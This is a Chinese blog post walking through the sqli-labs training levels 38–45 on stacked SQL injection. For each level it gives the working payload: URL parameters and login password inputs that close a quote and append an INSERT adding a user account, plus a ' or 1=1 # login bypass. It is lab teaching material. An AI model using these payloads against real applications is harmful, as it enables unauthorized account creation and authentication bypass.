美文网首页
sqli-labs level38-45 堆叠注入

sqli-labs level38-45 堆叠注入

作者: z1挂东南 | 来源:发表于2019-08-05 16:20 被阅读0次

第三十八关

堆叠注入,单引号闭合。
可以用联合查询注入,


1.png

但是题目是堆叠注入所以用堆叠。向users表中插入一条用户信息:
?id=1';insert into users(id,username,password) values (20,'d38','d38'); --+

2.png

查看users表:


3.png

之所以可以使用堆叠查询是因为这里:


4.png

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

第三十九关

堆叠注入,也可联合注入,整数型。

第四十关

堆叠,也可联合,单引号括号闭合。

第四十一关

堆叠,也可联合,整数型。


5.png

第四十二关

利用堆叠注入加一条用户信息,单引号闭合。我用hackbar试了半天不行,最后在页面的文本框中写的语句就可以了。这关要在密码框写SQL语句,因为在源码中看到,它会对提交的用户名使用函数进行过滤,过滤掉特殊字符。


6.png

username:admin
password:1’;insert into users values(42,’d42’,’d42’);#

7.png

提交之后是错误页面,点home返回,然后输入我们刚才插入的账号和密码,发现成功登陆了。


8.png

除了使用堆叠注入,还可以使用万能密码登录,同样是在密码框写sql语句:
username:admin
password:1’ or 1=1 #

9.png

第四十三关

和42关思路一样,利用堆叠注入加一条用户信息,只不过这关是单引号括号闭合。
username:admin
password:1’);insert into users values(43,’d43’,’d43’);#

10.png

第四十四关

和第42关做法一模一样,也是单引号闭合。
username:admin
password:1';insert into users values(44,'d44','d44');#

11.png

第四十五关

和43关一模一样
username:admin
password:1');insert into users values(45,'d45','d45')#

12.png

相关文章

  • sqli-labs level38-45 堆叠注入

    第三十八关 堆叠注入,单引号闭合。可以用联合查询注入, 但是题目是堆叠注入所以用堆叠。向users表中插入一条用户...

  • 搭建sqli-labs注入平台

    搭建SQL注入平台 docker搭建sqli-labs 运行sqli-labs 初始化数据库 访问sqli-labs

  • 堆叠注入

    SQL注入之堆叠注入 之前一直以为堆叠注入不适合mysql数据库,实战中也没有尝试过堆叠注入,今天看书《web安全...

  • BUUCTF-Web-随便注(三种解题思路)

    知识点:SQL注入-堆叠注入,sql预处理语句,巧用contact()函数绕过 堆叠注入原理: 在SQL中,分号(...

  • 威力巨大的堆叠注入

    堆叠注入 - 定义 堆叠注入(Stacked Injections)一堆SQL语句(多条)一起执行在MySQL中。...

  • Sql-labs-page3

    less-38 (堆叠注入) 堆叠注入讲解 less-39 解题链接 less-40 less-41 less-...

  • SQL注入-堆叠查询注入

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 堆叠注入。从名词的含义就可以看到应该是一堆sql语句(...

  • sqli-labs Less-50-53

    Less-50堆叠注入看源码使用了mysqli_multi_query()函数出现了该函数可考虑堆叠注入构造pay...

  • sqlmap的使用

    摘要:使用sqlmap注入本地搭建的sqli-labs过程记录 学习SQL 注入,一直在手注,关于工具的使用的学习...

  • Mysql手工注入

    整理一下手工注入笔记,以sqli-labs环境为例。 1.Mysql手工union联合查询注入 输入单引号,页面报...

网友评论

      本文标题:sqli-labs level38-45 堆叠注入

      本文链接:https://www.haomeiwen.com/subject/nxvmdctx.html